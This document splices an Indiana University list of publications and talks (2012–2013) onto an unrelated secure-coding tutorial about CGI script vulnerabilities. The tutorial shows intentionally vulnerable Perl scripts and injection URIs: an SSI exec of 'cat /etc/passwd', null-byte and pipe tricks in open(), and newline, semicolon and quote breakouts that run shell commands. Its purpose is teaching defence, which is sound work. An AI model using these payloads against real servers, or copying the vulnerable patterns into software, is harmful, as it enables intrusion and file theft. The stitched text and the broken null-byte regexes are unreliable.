Kulkarni, A., L. Ionkov, M. Lang, and A. Lumsdaine, Optimizing process creation and execution on multi-core architectures International Journal of High Performance Computing Applications, Apr 2013.

Sterling, T., ParalleX: Execution Models for Extreme-scale Computing, Rockville, MD, Presentation at the DOE Modeling Execution Models Program mid-term review, Apr 2013.

Cate, F. H., Password Vulnerability and Liability, Centre for Information Policy Leadership at Hunton & Williams LLP, Apr 2013.

2013
Barnett, W. K., Research Networking, CTSA Communications Key Function Committee Face-to-Face Albuquerque, NM. , Apr 2013.

Miller, J., Research Technologies’ Storage Systems, IUPUI Campus – Indianapolis, Apr 2013.

 Download: hpfs_department_presenation_20130412.pptx (2.17 MB)

Fidler, D. P., Rules of Engagement for Cyber Operations, Security Seminar Series of the IU Center on Applied Cybersecurity Research, Bloomington, Indiana, Apr 2013.

Chakraborty, A., M. Pathirage, I. Suriarachchi, K. Chandrasekar, C. Mattocks, andB. Plale, Storm Surge Simulation and Load Balancing in Azure Cloud High Performance Computing Symposium (HPC’13), San Diego, California, Society for Modeling and Simulation International (SCS) and ACM, Apr 2013. Abstract

Plale, B., Studies in Social-Ecological Systems Data Management, Inter-university Consortium for Political and Social Research (IPCSR), Ann Arbor, MI, Apr 2013.

Gupta, M., A Tale of Two Evils: Fraud and Privacy in Online Advertising, University of Illinois at Urbana-Champaign, Apr 2013.

Gupta, M., A Tale of Two Evils: Fraud and Privacy in Online Advertising, Virginia Tech (National Capital Region location) , Apr 2013.

Cate, F. H., Transforming Society and Bridging Cultural Differences via Online Services, U.S.-China Internet Industry Forum, Beijing, China, Apr 2013.

Shackelford, S. J., Unpacking the Cyber Threat, Stanford, California, Apr 2013.

Dunn, J. W., and M. Notess, The Avalon Media System: A Next-Generation Solution for Media Management and Access, The Indiana University Digital Library Brownbag Series, Bloomington, IN, Mar 2013.

Ahn, Y. – Y., Community structure in networks, DIMACS, Rutgers University, Mar 2013.

Quick, R., Computational Sciences at Indiana University (CSIU) Virtual Organization, Open Science Grid All Hands Meeting Indianapolis IN., Mar 2013.

, Cyberinfrastructure at IU and the IU Pervasive Technology Institute, Presentation for Deutsche Forschungsgemeinschaft, Mar 2013.

 Download: dfg_2013_mar_11_final_1.pptx (5.67 MB)

Cate, F. H., Effective Data Protection for the 21st Century, 2013 International Association of Privacy Professionals Global Privacy Summit, Washington, D.C., Mar 2013.

Sherman, W. R., D. Coming, and S. Su, FreeVR: honoring the past, looking to the future SPIE 8649, The Engineering Reality of Virtual Reality 2013, 864906, Mar 2013.

Sterling, T., Gaps Between Big Computing and Big Data, Jekyll island, GA, Panel at SOS-17, Mar 2013.

Barnett, W. K., and R. LeDuc, Next Generation Cyberinfrastructures for Next Generation Sequencing and Genome Science , AMIA 2013 Translational Bioinformatics Summit San Francisco, CA., Mar 2013.

Barnett, W. K., and R. LeDuc, Next Generation Cyberinfrastructures for Next Generation Sequencing and Genome Science , AMIA 2013 Translational Bioinformatics Summit San Francisco, CA. , Mar 2013.

, Participant, Web Observatory Workshop, Northwestern University, Chicago, Illinois, Mar 2013.

2013
Barnett, W. K., Presentation Skills, AAMC GIR Leadership Institute New Orleans, LA, Mar 2013.

Ghoshal, D., and B. Plale, Provenance from Log Files: a BigData ProblemBigProv’13 @ EDBT/ICDT, Genoa, Italy, ACM, Mar 2013. Abstract

Barnett, W. K., Research at Academic Health Centers, AAMC GIR Leadership Institute New Orleans LA., Mar 2013.

Pierce, M., Science Gateways, OSG All Hands Meeting , Indiana University – Purdue University 420 University Blvd. Indianapolis, IN 46202, Mar 2013.

 Download: pierce-osg-allhands2013-slides.pptx (2.78 MB)

Stewart, C. A., This was unexpected, Keynote Talk, Open Science Grid All Hand Meeting, Indianapolis, IN. , Mar 2013.

 Download: osg-all-hands_2013_mar_11_final.pptx (9.28 MB)

Sterling, T., Towards Exascale- An Arrow in Flight, Newport, RI, Presentation at the NHPCC Conference, Mar 2013.

, Tracking the diffusion of ideas in social media, School of Journalism Colloquium, INdiana University, Bloomington, Indiana, Mar 2013.

Swany, M., Unified Experiment Environment, Service Developers Roundtable, The 16th GENI Engineering Conference (GEC16), Salt Lake City, UT, Mar 2013.

Cate, F. H., Accountability in Distributed Environments, Accountability Phase V—The Essential Elements in Distributed Environments, Warsaw, Poland, Feb 2013.

Sterling, T., Connections for Coordination of DOE Exascale Research and Development, Livermore, CA, Presentation at the DOE Exascale Ecosystem Coordination Meeting, Feb 2013.

Cate, F. H., Critical Infrastructure Executive Order, Centre for Information Policy Leadership at Hunton & Williams LLP, Feb 2013.

Edmonds, N., J. Willcock, and A. Lumsdaine, Expressing Graph Algorithms Using Generalized Active MessagesPrinciples and Practice of Parallel Programming, Poster., Feb 2013.

Cate, F. H., Is There Any Hope for Cybersecurity?, Indiana University Retirees’ Association, Bloomington, Indiana, Feb 2013.

Templeman, R., Z. Rahman, D. Crandall, and A. Kapadia, PlaceRaider: Virtual theft in physical spaces with smartphones Network and Distributed System Security Symposium 2013, San Diego, CA, Feb 2013.

Kapadia, A., R. Templeman, Z. Rahman, and D. Crandall, PlaceRaider: Virtual Theft in Physical Spaces with Smartphones Proceedings of the 20th Annual Network & Distributed System Security Symposium, Feb 2013.

2013
Gupta, M., Unearthing the Roots of Cyberfraud: Exposing DNS Exploitation in Ad Fraud and Phishing, Syracuse University’s Department of Electrical Engineering and Computer Science, Feb 2013.

Cate, F. H., Unearthing the Roots of Cyberfraud: Exposing DNS Exploitation in Ad Fraud and Phishing, New Jersey Institute of Technology’s Department of Computer Science, Feb 2013.

Zhang, H., and M. J. Boyles, Visual exploration and analysis of human-robot interaction rules SPIE, Visualization and Data Analysis, vol. 8654, Burlingame, California, Feb 2013.

Zhang, H., and M. J. Boyles, Visual exploration and analysis of human-robot interaction rules, SPIE, Visualization and Data Analysis 2013, Burlingame, California, Feb 2013.

Barnett, W. K., and M. Tavares, Informatics Core, Winter 2013 CIFSAD Meeting Bethesda, MD, Jan 3013, 2013.

Dunn, J. W., and A. Hallett, The Avalon Media System, Opencast Matterhorn 2013 Unconference, San Diego, California, Jan 2013.

Notess, M., and J. Dunn, The Avalon Media System: A Next-Generation Solution for Media Management and Access, Digital Library Brownbag Technical Presentation, Bloomington, IN , Jan 2013.

Ahn, Y. – Y., Community structure in networks, Colloquium, Department of Computer & Information Science, IUPUI, Jan 2013.

, Detecting Early Signature of Persuasion in Information Cascades, DARPA ADAMS/SMISC PI meeting, Arlington, Virginia, Jan 2013.

Swany, M., Developing a Unified Network Information Service, 2013 Winter Internet2/Joint Techs Conference, Keoni, HI, Jan 2013.

McDonald, R. H., Kuali OLE Overview, Sponsored event by the GBV and HBZ Library Consortia, Cologne, Germany, Jan 2013.

Hallock, B., Rockhopper: Penguin on Demand at Indiana University, Presented in-booth at the Plant and Animal Genome XXI conference, San Diego, CA., Jan 2013.

 Download: rockhopper_pagxxi.pptx (1.99 MB)

McDonald, R. H., B. Plale, J. Myers, M. Hedstrom, P. Kumar, K. Chandrasekar, I. Kouper, and S. Konkiel, The SEAD (Sustainable Environment-Actionable Data) DataNet Prototype, 8th International Digital Curation Conference, IDCC Conference, Amsterdam, NL, Jan 2013.

Plale, B., R. H. McDonald, K. Chandrasekar, I. Kouper, S. Konkiel, M. L. Hedstrom, J. Myers, and P. Kumar, SEAD Virtual Archive: Building a Federation of Institutional Repositories for Long-Term Data Preservation in Sustainability Science 8th International Digital Curation Conference, Amsterdam, Netherlands, Jan 2013.

2013
Sun, X., J. Kaur, S. Milojevic, A. Flammini, and F. Menczer, Social Dynamics of Science Nature Scientific Reports, vol. 3, no. 1069, Jan 2013.

LeDuc, R., Statistical Consideration for Identification and Quantification in Top-Down Proteomics, American Society for Mass Spectrometry – Sanibel Conference 2013, St Pete Beach, FL, Jan 2013.

 Download: sanibel2013-rleduc.pptx (2.79 MB)

Swany, M., Tools and Resources for Software Defined Networks, NSF GENI CC-NIE Workshop, Washington, D.C., Jan 2013.

Kowalczyk, S. T., Y. Sun, Z. Peng, B. Plale, A. Todd, L. Auvil, C. Willis, J. Zeng, M. Pathirage, S. Liyanage, et al., Big Data at Scale for Digital Humanities: An Architecture for the HathiTrust Research Center In Big Data Management, Technologies, and Applications, Wen-Chen Hu and Naima Kaabouch (eds) , Hersey, PA, IGI Global, 2013.

Plale, B., Big Data Opportunities and Challenges for Information Retrieval, Text Mining, and NLP, Knowledge Media Institute (KMi), The Open University, Milton Keynes, UK, 2013.

McDonald, R. H., I. Kouper, and B. Plale, Crowd-Sourced Infrastructure: Universities as Partners in Provisioning Public Access to Federally Supported Research Public Access to Federally Supported Research and Development Publications and Data – Public Comment Meeting: National Academy of Sciences, 2013.

Chen, P., B. Plale, and T. Evans, Dependency Provenance in Agent Based Modeling The 9th IEEE International Conference on eScience (eScience 2013), Beijing, China, 2013. Abstract

Dalmau, M., Digital Humanities and Libraries: More of THAT! , no. May 22, 2013: ACRL dh+lib, 2013.

Swany, M., Driving Software Defined Networks with XSP, Applications for Dynamic Circuits, 2013 Internet2 Members Meeting , 2013.

Kowalczyk, S. T., The e-Science Data Environment: Modeling the Research Data Lifecycle Journal of the American Society for Information Science and Technology, 2013.

Cate, F. H., and N. N. Minnow, Government Data Mining McGraw-Hill Handbook of Homeland Security, 2d, 2013.

Cheah, Y. – W., R. Canon, B. Plale, and L. Ramakrishnan, Milieu: Lightweight and Configurable Big Data Provenance for Science IEEE 2nd International Congress on Big Data, Santa Clara, CA, IEEE, 2013.

Cate, F. H., and V. Mayer-Schonberger, Notice and Consent in a World of Big Data International Data Privacy Law, vol. 3, 2013.

Kouper, I., K. G. Akers, N. H. Nicholls, and F. C. Sferdean, A Roadmap for Data Services: ACM, The Joint Conference on Digital Libraries (JCDL’13),http://www.jcdl2013.org/, Indianapolis, IN, 2013. Abstract

2012
Pallickara, S., and G. Fox, Recent Work in Utility and Cloud Computing Future Generation Computer Systems, no. Special Issue, Dec 28 2012.

Kouper, I., CLIR/DLF Digital Curation Postdoctoral Fellowship – The Hybrid Role of Data Curator. The Bulletin of the American Society of Information Science and Technology, vol. 39, no. 2, pp. 46-47, Dec 2012.

Kulkarni, A., A. Manzanares, L. Ionkov, M. Lang, and A. Lumsdaine, The Design and Implementation of a Multi-level Content-Addressable Checkpoint File System Proceedings of the 19th International Conference on High Performance Computing (HiPC 2012), Dec 2012.

More documents can be found on: http://internal.pti.iu.edu/pubs

Avoiding security holes when developing an application – Part 6: CGI scripts


Web server, URI and configuration problems

(Too short) Introduction on how a web server works and how to build an URI

When a client asks for a HTML file, the server sends the requested page (or an error message). The browser interprets the HTML code to format and display the file. For instance, typing thehttp://www.linuxdoc.org/HOWTO/ HOWTO-INDEX/howtos.html
URL (Uniform Request Locator), the client connects to the http://www.linuxdoc.org server and asks for the/HOWTO/HOWTO-INDEX/howtos.html page (called URI – Uniform Resource Identifiers), using the HTTP protocol. If the page exists, the server sends the requested file. With this static model, if the file is present on the server, it is sent “as is” to the client, otherwise an error message is sent (the well known 404 – Not Found).

Unfortunately, this doesn’t allow interactivity with the user, making features such as e-business, e-reservation for holidays or e-whatever impossible.

Fortunately, there are solutions to dynamically generate HTML pages. CGI (Common Gateway Interface) scripts are one of them. In this case, the URI to access web pages is built in a slightly different way :

http://<server><pathToScript>%5B?%5Bparam_1=val_1%5D%5B...] [&param_n=val_n]]
The arguments list is stored in the QUERY_STRING environment variable. In this context, a CGI script is nothing but an executable file. It uses the stdin (standard input) or the environment variableQUERY_STRING to get the arguments passed to it. After executing the code, the result is displayed on the stdout (standard output) and then, redirected to the web client. Almost every programming language can be used to write a CGI script (compiled C program, Perl, shell-scripts…).

For example, let’s search what the HOWTOs from http://www.linuxdoc.org know about ssh :

http://www.linuxdoc.org/cgi-bin/ldpsrch.cgi? svr=http%3A%2F%2Fwww.linuxdoc.org&srch=ssh&db=1& scope=0&rpt=20
In fact, this is much simpler than it seems. Let’s analyze this URL:

  • the server is still the same one http://www.linuxdoc.org ;
  • the requested file, the CGI script, is called /cgi-bin/ldpsrch.cgi ;
  • the ? is the beginning of a long list of arguments :
    1. srv=http%3A%2F%2Fwww.linuxdoc.org is the server where the request comes from;
    2. srch=ssh contains the request itself;
    3. db=1 means the request only concerns HOWTOs;
    4. scope=0 means the request concerns the document’s content and not only its title;
    5. rpt=20 limits to 20 the number of displayed answers.

Often, arguments names and values are explicit enough to understand their meaning. Furthermore, the content of the page displaying the answers is rather significant.

Now you know that the bright side of CGI scripts is the user’s ability to pass in arguments… but the dark side is that a badly written script opens a security hole.

You probably noticed the strange characters used by your preferred browser or present within the previous request. Those characters are encoded with the ISO 8859-1 charset (have a look at >man iso_8859_1). The table 1 provides with the meaning of some of these codes. Let’s mention some IIS4.0 and IIS5.0 servers have a very dangerous vulnerability called unicode bug based on the extended unicode representation of “/” and “\”. .

Apache configuration with “SSI Server Side Include

Server Side Include is a part of a web server’s functionality. It allows integrating instructions into web pages, either to include a file “as is”, or to execute a command (shell or CGI script).

In the Apache configuration file httpd.conf, the “AddHandler server-parsed .shtml” instruction activates this mechanism. Often, to avoid the distinction between .html and .shtml, one can add the .html extension. Of course, this slows down the server… This can be controlled at directories level with the instructions :

  • Options Includes activates every SSI ;
  • OptionsIncludesNoExec prohibits exec cmd and exec cgi.

In the attached guestbook.cgi script, the text provided by the user is included into an HTML file, without ‘<‘ and ‘ >’ character conversion into &lt; and &gt; HTML code. A curious person could submit one of the following instructions :

  • <!--#printenv --> (mind the space after printenv  )
  • <!--#exec cmd="cat /etc/passwd"-->

With the first one,
guestbook.cgi?email=pappy&texte=%3c%21--%23printenv%20--%3e
you get a few lines of information about the system :

DOCUMENT_ROOT=/home/web/sites/www8080
HTTP_ACCEPT=image/gif, image/jpeg, image/pjpeg, image/png, */*
HTTP_ACCEPT_CHARSET=iso-8859-1,*,utf-8
HTTP_ACCEPT_ENCODING=gzip
HTTP_ACCEPT_LANGUAGE=en, fr
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=www.esiea.fr:8080
HTTP_PRAGMA=no-cache
HTTP_REFERER=http://www.esiea.fr:8080/~grenier/cgi/guestbook.cgi?
 email=&texte=%3C%21--%23include+file%3D%22guestbook.cgi%22--%3E
HTTP_USER_AGENT=Mozilla/4.76 [fr] (X11; U; Linux 2.2.16 i686)
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR=194.57.201.103
REMOTE_HOST=nef.esiea.fr
REMOTE_PORT=3672
SCRIPT_FILENAME=/mnt/c/nef/grenier/public_html/cgi/guestbook.html
SERVER_ADDR=194.57.201.103
SERVER_ADMIN=master8080@nef.esiea.fr
SERVER_NAME=www.esiea.fr
SERVER_PORT=8080
SERVER_SIGNATURE=<ADDRESS>Apache/1.3.14 Server www.esiea.fr Port 8080</ADDRESS>

SERVER_SOFTWARE=Apache/1.3.14 (Unix)  (Red-Hat/Linux) PHP/3.0.18
GATEWAY_INTERFACE=CGI/1.1
SERVER_PROTOCOL=HTTP/1.0
REQUEST_METHOD=GET
QUERY_STRING=
REQUEST_URI=/~grenier/cgi/guestbook.html
SCRIPT_NAME=/~grenier/cgi/guestbook.html
DATE_LOCAL=Tuesday, 27-Feb-2001 15:33:56 CET
DATE_GMT=Tuesday, 27-Feb-2001 14:33:56 GMT
LAST_MODIFIED=Tuesday, 27-Feb-2001 15:28:05 CET
DOCUMENT_URI=/~grenier/cgi/guestbook.shtml
DOCUMENT_PATH_INFO=
USER_NAME=grenier
DOCUMENT_NAME=guestbook.shtml

The exec instruction, provides you almost with a shell equivalent :



guestbook.cgi?email=ppy&texte=%3c%21--%23exec%20cmd="cat%20/etc/passwd"%20--%3e

Don’t try “<!--#include file="/etc/passwd"-->“, the path is relative to the directory where you can find the HTML file and can’t contain “..“. The Apacheerror_log file, then contains a message indicating an access attempt to a prohibited file. The user can see the message [an error occurred while processing this directive] in the HTML page.

SSI are not often needed so it is better to deactivate it on the server. However the cause of the problem is the combination of the broken guestbook application and the SSI.

Perl Scripts

In this section, we present security holes related to CGI scripts written with Perl. To keep things clear, we don’t provide the examples full code but only the parts required to understand where the problem is.

Each of our scripts is built according the following template :

#!/usr/bin/perl -wT
BEGIN { $ENV{PATH} = '/usr/bin:/bin' }
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};   # Make %ENV safer =:-)
print "Content-type: text/html\n\n";
print "<HTML>\n<HEAD>";
print "<TITLE>Remote Command</TITLE></HEAD>\n";
&ReadParse(\%input);
# now use $input e.g like this:
# print "<p>$input{filename}</p>\n";
# #################################### #
# Start of problem description         #
# #################################### #



# ################################## #
# End of problem description         #
# ################################## #

form:
print "<form action=\"$ENV{'SCRIPT_NAME'}\">\n";
print "<input type=texte name=filename>\n </form>\n";
print "</BODY>\n";
print "</HTML>\n";
exit(0);

# first arg must be a reference to a hash.
# The hash will be filled with data.
sub ReadParse($) {
  my $in=shift;
  my ($i, $key, $val);
  my $in_first;
  my @in_second;

  # Read in text
  if ($ENV{'REQUEST_METHOD'} eq "GET") {
    $in_first = $ENV{'QUERY_STRING'};
  } elsif ($ENV{'REQUEST_METHOD'} eq "POST") {
    read(STDIN,$in_first,$ENV{'CONTENT_LENGTH'});
  }else{
    die "ERROR: unknown request method\n";
  }

  @in_second = split(/&/,$in_first);

  foreach $i (0 .. $#in_second) {
    # Convert plus's to spaces
    $in_second[$i] =~ s/\+/ /g;

    # Split into key and value.
    ($key, $val) = split(/=/,$in_second[$i],2);

    # Convert %XX from hex numbers to alphanumeric
    $key =~ s/%(..)/pack("c",hex($1))/ge;
    $val =~ s/%(..)/pack("c",hex($1))/ge;

    # Associate key and value
    #  is the multiple separator
    $$in{$key} .= "" if (defined($$in{$key}));
    $$in{$key} .= $val;

  }
  return length($#in_second);
}

More on the arguments passed to Perl (-wT) later. We begin cleaning up the $ENV and $PATH environment variables and we send the HTML header (this is something part of the html protocl between browser and server. You can’t see it in the webpage displayed on the browser side). The ReadParse() function reads the arguments passed to the script. This can be done more easily with modules, but this way you can see the whole code. Next, we present the examples. Last, we finish with the HTML file.

The null byte

Perl considers every character in the same way, what differs from C functions, for instance. For Perl, the null character to end a string is a character like any other one. So what ?

Let’s add the following code to our script to create showhtml.cgi  :

  # showhtml.cgi
  my $filename= $input{filename}.".html";
  print "<BODY>File : $filename<BR>";
  if (-e $filename) {
      open(FILE,"$filename") || goto form;
      print <FILE>;
  }

The ReadParse() function gets the only argument : the name of the file to display. To prevent some “rude guest” from reading more than the HTML files, we add the “.html” extension at the end of the filename. But, remember, the null byte is a character like any other one…

Thus, if our request is showhtml.cgi?filename=%2Fetc%2Fpasswd%00 the file is called my $filename = "/etc/passwd.html" and ours astounded eyes gaze at something not being HTML.

What happens ? The strace command shows how Perl opens a file:

  /tmp >>cat >open.pl << EOF
  > #!/usr/bin/perl
  > open(FILE, "/etc/passwd.html");
  > EOF
  /tmp >>chmod 0700 open.pl
  /tmp >>strace ./open.pl 2>&1 | grep open
  execve("./open.pl", ["./open.pl"], [/* 24 vars */]) = 0
  ...
  open("./open.pl", O_RDONLY)             = 3
  read(3, "#!/usr/bin/perl\n\nopen(FILE, \"/et"..., 4096) = 51
  open("/etc/passwd", O_RDONLY)           = 3

The last open() presented by strace corresponds to the system call, written in C. We can see, the .html extension disappeared, and this allowd us to open /etc/passwd.

This problem is solved with a single regular expression which removes all null bytes:

s///g;

Using pipes

Here is a script without any protection. It displays a given file from the directory tree /home/httpd/ :

#pipe1.cgi

my $filename= "/home/httpd/".$input{filename};
print "<BODY>File : $filename<BR>";
open(FILE,"$filename") || goto form;
print <FILE>;

Don’t laugh at this example ! I have seen such scripts.

The first exploit is obvious :

pipe1.cgi?filename=..%2F..%2F..%2Fetc%2Fpasswd

One need only go up the tree to access any file. But there is another much more interesting posibility: to execute the command of your choice. In Perl, the open(FILE, "/bin/ls") command opens the “/bin/ls” binary file… but open(FILE, "/bin/ls |") executes the specified command. Adding a single pipe | changes the behavior of open().

Another problem comes from the fact that the existence of the file is not tested, which allows us to execute any command but also to pass any arguments : pipe1.cgi?filename=..%2F..%2F..%2Fbin%2Fcat%20%2fetc%2fpasswd%20| displays the password file content.

Testing the existence of the file to open gives less freedom :

#pipe2.cgi

my $filename= "/home/httpd/".$input{filename};
print "<BODY>File : $filename<BR>";
if (-e $filename) {
  open(FILE,"$filename") || goto form;
  print <FILE>
} else {
  print "-e failed: no file\n";
}

The previous example doesn’t work anymore. The “-e” test fails since it can’t find the “../../../bin/cat /etc/passwd |” file.

Let’s try now the /bin/ls command. The behavior will be the same as before. That is, if we try, for instance, to list the /etc directory content, “-e” tests the existence of the “../../../bin/ls /etc | file, but it doesn’t exist either. As soon as we don’t provide the name of a “ghost” file, we won’t get anything interesting :(

However, there is still a “way out”, even if the result is not so good. The /bin/ls file exists (well, in most of the systems), but if open() is called with this filename, the command won’t be executed but the binary will be displayed. We must then find a way to put a pipe ‘|‘ at the end of the name, without it to be used during the check done by “-e“. We already know the solution : the null byte. If we send “../../../bin/ls|” as name, the existence check succeeds since it only considers “../../../bin/ls“, but open() can see the pipe and then executes the command. Thus, the URI providing the current directory content is :

pipe2.cgi?filename=../../../bin/ls%00|

Line feed

The finger.cgi script executes the finger instruction on our machine :

#finger.cgi

print "<BODY>";
$login = $input{'login'};
$login =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
$CMD= "/usr/bin/finger $login|";
open(FILE,"$CMD") || goto form;
print <FILE>

This script, (at least) takes a useful precaution : it takes care of some strange characters to prevent them from being interpreted with a shell by placing a ‘\‘ in front. Thus, the semicolon is changed to “\;” by the regular expression. But the list doesn’t contain every important character. Among others, the line feed ‘\n‘ is missing.

In your preferred shell command line, you validate an instruction typing the RETURN or ENTER key that sends a ‘\n‘ character. In Perl, you can do the same. We already saw the open() instruction allowed us to execute a command as soon as the line ended with a pipe ‘|‘.

To simulate this behavior we to add a carriage-return and an instruction after the login sent to the finger command :

finger.cgi?login=kmaster%0Acat%20/etc/passwd

Other characters are quite interesting to execute various instructions in a row :

  • ;  : it ends the first instruction and goes to the next one;
  • &&  : if the first instruction succeeds (i.e. returns 0 in a shell), then the next one is executed;
  • ||  : if the first instruction fails (i.e. returns a no null value in a shell), then the next one is executed.

They don’t work here since they are protected with the regular expression. But, let’s find a way to work this out.

Backslash and semicolon

The previous finger.cgi script avoides problems with some strange characters. Thus, the URI <finger.cgi?login=kmaster;cat%20/etc/passwd doesn’t work when the semicolon is escaped. However, one character is not protected : the backslash ‘\‘.

Let’s take, for instance, a script that prevents us from going up the tree by using the regular expression s/\.\.//g to get rid of “..“. It doesn’t matter! Shells can manage various numbers of ‘/‘ at once (just try cat ///etc//////passwd to get convinced).

For example, in the above pipe2.cgi script, the $filename variable is initialized from the “/home/httpd/” prefix. Using the previous regular expression could seem efficient to prevent from going up through the directories. Of course, this expression protects from “..“, but what happens if we protect the ‘.‘ character ? That is, the regular expression doesn’t match if the filename is .\./.\./etc/passwd. Let’s mention, this works very well withsystem() (or ` ... `), but open() or “-e” fails.

Let’s go back to the finger.cgi script. Using the semicolon, the finger.cgi?login=kmaster;cat%20/etc/passwd URI doesn’t give the expected result since the semicolon is escaped by the regular expression. That is, the shell receives the instruction :

/usr/bin/finger kmaster\;cat /etc/passwd

The following errors are found in the web server logs :

finger: kmaster;cat: no such user.
finger: /etc/passwd: no such user.

These messages are identical to those you can get when typing this line in a shell. The problem comes from the fact the protected ‘;‘ considers this character as belonging to the string “kmaster;cat” .

We want to separate both instructions, the one from the script and the one we want to use. We must then protect the ‘;‘ : <A HREF="finger.cgi?login=kmaster\;cat%20/etc/passwd"> finger.cgi?login=kmaster\;cat%20/etc/passwd</A>. The “\; string, is then changed by the script into “\\;“, and next, sent to the shell. This last reads :

/usr/bin/finger kmaster\\;cat /etc/passwd

The shell splits this into two different instructions :

  1. /usr/bin/finger kmaster\ which probably will fail… but we don’t care ;-)
  2. cat /etc/passwd which displays the password file.

The solution is simple : the backslash ‘\‘ must be escaped, too.

Using an unprotected ” character

Sometimes, the parameter is “protected” using quotes. We have changed the previous finger.cgi script to protect the $login variable that way.

However, if the quotes are not escaped, it’s useless. Even one added in your request will fail. This happens because the first quote sent closes the opening one from the script. Next, you write the command, and a second quote opens the last (closing) quote from the script.

The finger2.cgi script illustrates this :

#finger2.cgi

print "<BODY>";
$login = $input{'login'};
$login =~ s///g;
$login =~ s/([<>\*\|`&\$!#\(\)\[\]\{\}:'\n])/\\$1/g;
print "Login $login<BR>\n";
print "Finger<BR>\n";
#New (in)efficient super protection :
$CMD= "/usr/bin/finger \"$login\"|";
open(FILE,"$CMD") || goto form;
while(<FILE>) {
  print;
}

The URI to execute the command then becomes :

finger2.cgi?login=kmaster%22%3Bcat%20%2Fetc%2Fpasswd%3B%22

The shell receives the command /usr/bin/finger "$login";cat /etc/passwd"" and the quotes are not a problem anymore.

So, it’s important, if you wish to protect the parameters with quotes, to escape them as for the semicolon or the backslash already mentioned.

Writing in Perl

Warning and tainting options

When programming in Perl, use the w option or “use warnings;” (Perl 5.6.0 and later), it informs you about potential problems, such as uninitialized variables or obsolete expressions/functions.

The T option ( taint mode) provides higher security. This mode activates various tests. The most important concerns a possible tainting of variables. Variables are either clean or tainted. Data coming from outside the program is considered as tainted as long as it hasn’t been cleaned up. Such a tainted variable is then unable to assign values to things that are used outside the program (calls to other shell comands).

In taint mode, the command line arguments, the environment variables, some system call results (readdir(), readlink(), readdir(), …) and the data coming from files, are considered suspicious and thus tainted.

To clean up a variable, you must filter it through a regular expression. Obviously, using .* is useless. The goal is to force you to take care of provided arguments. Always use a regular expression that is as specific as possible.

Nevertheless, this mode doesn’t protect from everything : the tainting of arguments passed to system() or exec() as a list variable is not checked. You must then be very careful if one of your scripts uses these functions. The exec "sh", '-c', $arg; instruction is considered as secure, whether$arg is tainted or not :(

It’s also recommended to add “use strict;” at the beginning of your programs. This forces you to declare variables; some people will find that annoying but it’s mandatory if you use mod-perl.

Thus, your Perl CGI scripts must begin with :

#!/usr/bin/perl -wT
use strict;
use CGI;

or with Perl 5.6.0 :

#!/usr/bin/perl -T
use warnings;
use strict;
use CGI;

Call to open()

Many programmers open a file simply using open(FILE,"$filename") || .... We already saw the risks of such code. To reduce the risk, specify the open mode :

  • open(FILE,"<$filename") || ... for read only;
  • open(FILE,">$filename") || ... for write only

Don’t open your files in an unspecified way.

Before accessing a file, it’s recommended to check if the file exists. This doesn’t prevent the race conditions types of problems presented in the previous article, but avoids some traps such as commands with arguments.

if ( -e $filename ) { ... }

Starting from Perl 5.6, there’s a new syntax for open() : open(FILEHANDLE,MODE,LIST). With the ‘<‘ mode, the file is open for reading; with the ‘>’ mode, the file is truncated or created if needed, and open for writing. This becomes interesting for modes communicating with other processes. If the mode is ‘|-‘ or ‘-|’, the LIST argument is interpreted as a command and is respectively found before or after the pipe.

Before Perl 5.6 and open() with three arguments, some people used the sysopen() command.

Input escaping and filtering

There are two methods : either you specify the forbidden characters, or you explicitely define the allowed characters using regular expressions. The example programs should have convinced you that it’s quite easy to forget to filter potentially dangerous characters, that’s why the second method is recommended.

Practically, here is what to do : first, check the request only holds allowed characters. Next, escape the characters considered as dangerous among the allowed ones.

#!/usr/bin/perl -wT

# filtre.pl

#  The $safe and $danger variables respectively define
#  the characters without risk and the risky ones.
#  Add or remove some to change the filter.
#  Only $input containing characters included in the
#  definitions are valid.

use strict;

my $input = shift;

my $safe = '\w\d';
my $danger = '&`\'\\|"*?~<>^(){}\$\n\r\[\]';
#Note:
#  '/', space and tab are not part of the definitions on purpose


if ($input =~ m/^[$safe$danger]+$/g) {
    $input =~ s/([$danger]+)/\\$1/g;
} else {
    die "Bad input chars in $input\n";
}
print "input = [$input]\n";

This script defines two character sets :

  • $safe contains the ones considered as not risky (here, only numbers and letters);
  • $danger contains the characters to be escaped since they are allowed but potentially dangerous.

Every request containing a character not present in one of the two sets is immediately rejected.

PHP scripts

I don’t want to be controversial, but I think it’s better to write scripts in PHP rather than in Perl. More exactly, as a system administrator, I prefer my users to write scripts in PHP language rather than in Perl. Someone programming insecurely in PHP will be as dangerous as Perl, so why prefer PHP ? If you have some programming problems with PHP, you can activate the Safe mode (safe_mode=on) or deactivate functions (disable_functions=...). This mode prevents accessing files not belonging to the user, changing environment variables unless explicitely allowed, executing commands, etc.

By default, the Apache banner informs us about the PHP being used.

$ telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.localdomain.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2001 11:22:41 GMT
Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) mod_ssl/2.7.1
        OpenSSL/0.9.5a PHP/4.0.4pl1 mod_perl/1.24
Connection: close
Content-Type: text/html

Connection closed by foreign host.

Write expose_PHP = Off into /etc/php.ini to hide the information :

Server: Apache/1.3.14 (Unix)  (Red-Hat/Linux) mod_ssl/2.7.1
OpenSSL/0.9.5a mod_perl/1.24

The /etc/php.ini file (PHP4) and /etc/httpd/php3.ini have many parameters that can help harden the system. For instance, the “magic_quotes_gpc” option adds quotes on the arguments received by the GET, POST methods and via cookies; this avoids a number of problems found in our Perl examples.

Conclusion

This article is probably the most easily understood among the articles in this series. It shows vulnerabilities exploited every day on the web. There are many others, often related to bad programming (for instance, a script sending a mail, taking the From: field as an argument, provides a good site for spamming). Examples are too numerous. As soon as a script is on a web site, you can bet at least one person will try to use it the wrong way.

This article ends the series about secure programming. We hope we helped you discover the main security holes found in too many applications, and that you will take into account the “security” parameter when designing and programming your applications. Security problems are often neglected because of the limited scope of the development (internal use, private network use, temporary model, etc.). Nevertheless, a module originally designed for only very restricted use can become the base for a much bigger application and then changes later on will be much more expensive.


Some URI Encoded characters

URI Encoding (ISO 8859-1) Character
%00 (end of string)
